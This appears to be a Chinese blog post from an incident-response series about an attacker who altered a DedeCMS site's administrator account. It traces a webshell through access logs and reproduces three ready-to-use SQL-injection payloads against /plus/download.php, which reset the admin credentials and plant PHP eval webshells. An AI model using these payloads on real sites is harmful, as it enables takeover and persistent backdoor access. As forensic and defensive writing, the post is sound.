管理员账号_Web应急实战篇(八):管理员账号被篡改

最新推荐文章于 2022-02-05 11:46:36 发布
最新推荐文章于 2022-02-05 11:46:36 发布
阅读量256 收藏
点赞数
文章标签: 管理员账号
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39965490/article/details/112622332
版权

你是某一个网站的管理员,有一天,你的管理员账号admin却登录不了,进入数据库查看,原来管理员账号用户名不存在了,却多了另外一个管理员用户名。不对,不是新增了管理员,而是你的管理员用户名被篡改了。

现象描述

前后端分离,后台只允许内网访问,管理员账号admin却依然被多次被篡改

问题处理

1、网站webshell

在针对网站根目录进行webshell扫描,发现存在脚本木马,创建时间为2018-06-13 04:30:30

b200a04c6d03031482e935d06151a265.png

2、 定位IP

通过木马创建时间, 查看网站访问日志,定位到IP为:180.xx.xx.3

91e56cde9300ed870caf66cf9afae296.png

3、关联分析

全局搜索与该IP有关的操作日志:

c289628d89aa9aa192baa433ca48375d.png

在脚本木马生成前,有两条比较可疑的访问日志吸引了我们的注意:

172.16.1.12 180.xx.xxx.3 - - [10/Jun/2018:08:41:43 +0800] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 200 67

172.16.1.12 180.xx.xxx.3 - - [10/Jun/2018:08:41:43 +0800] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 200 32

对这段POC进行解码,我们发现通过这个poc可以往数据库中插入数据,进一步访问/plus/ad_js.php?aid=19 即可在plus目录生成read.php脚本文件。

f2f27c6b5e38070dbb86ae8a81c5bc53.png

解码后:

cfg_dbprefixmyadSETnormbody= '<?php file_put_contents(''read.php'',''<?php eval($_POST[x]);echo mOon;?>'');?>' WHEREaid` =19 #

综上,可以推测/plus/download.php中可能存在SQL注入漏洞,接下来,收集网上已公开的有以下3种EXP进行漏洞复现。

漏洞复现

利用方式一:修改后台管理员

1、新建管理员账号test/test123789,可以成功登录网站后台

2、构造如下注入SQL语句:

cfg_dbprefixadmin SETuserid='spider',pwd='f297a57a5a743894a0e4' where id=19 #`

修改后台管理员为:用户名spider,密码admin。

(3)对应的EXP:

?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35

执行EXP后,相应后台数据库表变为如下:

756183c84b5b08464dd72ad9187c9b56.png

(4)因此相应后台登录用户变为spider密码admin

利用方式二:通过/plus/mytag_js.php文件生成一句话木马php

(1)如:构造如下注入SQL语句:

`cfg_dbprefixmytag(aid,expbody,normbody) VALUES(9013,@','{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @'``

(2)对应的EXP:

?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96

(3)执行EXP后,将向数据库表dede_mytag中插入一条记录,

0e9f6393f6749a6699a671cef395fe26.png

(4)执行如下语句,在/plus目录下生成90sec.php一句话木马 http://www.xxxx.com/plus/mytag_js.php?aid=9013

利用方式三:使/plus/ad_js.php文件变为一句话木马php

(1)如:构造如下注入SQL语句:

cfg_dbprefixmyadSETnormbody= '<?php file_put_contents(''read.php'',''<?php eval($_POST[x]);echo mOon;?>'');?>' WHEREaid =19 #`

(2)对应的EXP:

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35

(3)执行EXP后,将向数据库表dede_myad中插入一条记录。

(4)进一步访问/plus/ad_js.php?aid=19 即可在plus目录生成read.php脚本文件。

如何清除?

1、删除网站目录中的webshell

2、清除dede_myad、dede_mytag数据库表中插入的SQL语句,防止再次被调用生成webshell。

如何防御?

网站采用开源CMS搭建,建议及时对官方发布的系统补丁以及内核版本进行升级。

weixin_39965490
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web服务器管理系列:8、修改默认的管理员账号
认真搞技术
06-16 2080
默认情况下服务器的管理员的帐号是:
Web应急管理员账号篡改
06-10 294
你是某一个网站管理员,有一天,你的管理员账号admin却登录不了,进入数据库查看,原来管理员账号用户名不存在了,却多了另外一个管理员用户名。不对,不是新增了管理员,而是你的管理员用户名被篡改了。 现象描述 前后端分离,后台只允许内网访问,管理员账号admin却依然被多次被篡改 问题处理 1、网站webshell 在针对网站根目录进行webshell扫描,发现存在脚本木马,创建...
修改2003服务器系统默认的administrator帐号
静下心来写代码
08-28 1036
来源 今天有个朋友问我修改2003服务器系统默认的administrator帐号的方法,现在写出来和大家分享下。 一种方法是按"开始"--"运行" 输入: gpedit.msc 然后在"计算机配置"--"windows设置"--"安全设置"--"本地策略"--"安全选项" 那里 找到最下面的"帐号:重命名系统管理员帐号"那里改用户名.在"交互式登陆:不显示上一次的用户名"设置为"启
tp5 webshell漏洞,文件被篡改,fastadmin老版本的存在此问题,解决方法
qq_41409720的博客
08-30 2915
1.首先是把攻击文件清理。 找攻击文件的方式有在静态文件目录查找后缀为 “.php”的文件就好了 2.修改tp5底层的一个漏洞: 修改第一个文件 yourpath\thinkphp\library\think\App.php 搜索 public static function module( 找到 ==》 // 获取控制器名 $controller = stri...
应急响应 - Webshell 处理 15
战神/calmness的博客
02-05 9809
目录 Webshell概述 Webshell分类 JSP型Webshell脚本 ASP型Webshell脚本 PHP型Webshell脚本 Webshell用途 1.站长工具 2.持续远程控制 3.权限提升 4.极强的隐蔽性 Webshell检测方法 1.基于流量的Webshell检测 2.基于文件的Webshell检测 3.基于日志Webshell检测 Webshell防御方法 常规处置方法 入侵时间确定 Web日志分析 漏洞分析 漏洞修复 常用工具 扫.
xueshengguanli.rar_系统管理员
09-14
在“xueshengguanli.rar_系统管理员”这个压缩包中,我们可以推测它包含了一个学生管理系统,主要涉及学生、老师以及系统管理员的管理功能。这个系统可能是一个基于数据库的软件应用,用于高效地管理和处理教育机构...
易语言源码易语言提升管理员权限源码.rar
03-31
本压缩包“易语言源码易语言提升管理员权限源码.rar”包含的是一段用易语言编写的源代码,其主要目的是在操作系统中提升程序的权限至管理员级别,这对于执行需要高级权限的操作,如系统设置更改、文件系统访问等至关...
the_smart_contract_burger_store:建立智能合约来管理汉堡店
04-12
- **订单管理**:定义函数来处理客户下单、取消订单的操作,并更新库存和用户账户余额。 - **支付系统**:使用以太坊的内置代币Ether进行交易,可能包括支付验证和转移功能。 - **事件记录**:通过触发事件来记录...
Student_Details_Management_System:这是管理学生详细信息的基本html网页
03-15
7. **安全性**:虽然JavaScript主要用于前端,但也可以实施一些安全措施,比如XSS(跨站脚本攻击)防御,确保用户输入的数据不被恶意篡改。 8. **用户界面**:JavaScript库如jQuery或现代框架如React、Vue.js等可以...
Java课程设计:学生信息管理系统(java web版).zip
最新发布
03-04
7. **数据安全**:涉及用户隐私的信息管理,需要考虑数据加密、防止SQL注入、XSS攻击等安全措施,确保用户信息不被非法获取或篡改。 8. **版本控制与协作**:项目开发过程中,Git或SVN等版本控制工具用于协同工作,...
dede plus ad js.php,织梦dedecms/plus/文件夹的功能介绍
weixin_39988930的博客
03-19 184
/plus /–插件及辅助功能目录后台系统插件和辅助功能文件存放目录,你有什么辅助功能或者第三方开发的插件你需要用那么久需要放在这个文件夹中,文件夹中有dedecms自带的常用插件:plus 系统插件存放目录guestbook 留言板插件ad_js.php 广告插件advancedsearch.php 搜索bookfeedback.php 评论相关bookfeedback_js.php 评论相关b...
ad js.php aid,应急响应实例分享
weixin_39862847的博客
03-11 519
1.事件简述某天,发现网站被百度提示页面部分已被非法篡改。通过查看百度快照,发现网站首页确实被篡改,插入内容被编码,解码内容如下从上可确认,网站确实存在页面篡改情况。2.排查过程本次的排查过程还是很有趣的,中间还是有好多雷点,首先登录网站管理后台,发现网站首页篡改时间为10月6号。通过对日志进行分析发现攻击者通过test.php写入optimized.php后门,写入时间为06/Oct/2019:...
代码审计—Bluecms—sql—ad_js.php
王嘟嘟的博客
10-26 696
0x00 前言 如饥似渴的学习ing。 你可能需要看看这个: https://blog.csdn.net/qq_36869808/article/details/83029980 内容说明 这个漏洞大家之前都复现过,但是我也想试一试。我也不知道大佬们是怎么挖掘出来的。难道真的是一个参数一个参数进行尝试吗。这些疑问都是需要解决的。 0x01 start 1.黑盒测试 首先来看一下sql注入点 htt...
一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)
云度
10-18 7764
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? 无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下: 1 {dede:php}file_put_c
web 管理员系统
MIGENGKING的博客
03-22 1274
打开链接后会看到需要输入账号密码的选项: 一般情况先F12(有的电脑设置为Fn+F12)查看页面代码我发现了一串注释的Base64密码: 可能为密码,,,接着我们猜账号一般为“admin”,密码输入刚才注释的Bese密码(需要解码), 即使这样我们页面还是不变, 一般看到这种提示:需要想到 “X-Forwarded-For...
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 548
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
Linux运维之用户管理、用户身份切换(包括用户权力的下放)及 Linux 主机上的用户信息传递
qq_42303254的博客
11-04 652
一、实验环境(rhel7.0版本) 主机环境:rhel7.0 各主机信息 主机名 IP server 172.25.254.1 二、/etc/passwd文件,/etc/shadow文件,/etc/group文件,/etc/gshadow文件介绍 1、/etc/passwd文件(权限为644) [root@server1 /]# ll -d /etc/p...
standard_init_linux.go:228: exec user process caused: exec format error
03-16
这个错误通常是由于尝试在不同操作系统或体系结构之间运行二进制文件而引起的。 如果您在尝试运行二进制...3. 确保您的二进制文件没有损坏或被篡改。 如果您无法解决此问题,考虑向程序的开发人员或社区寻求帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值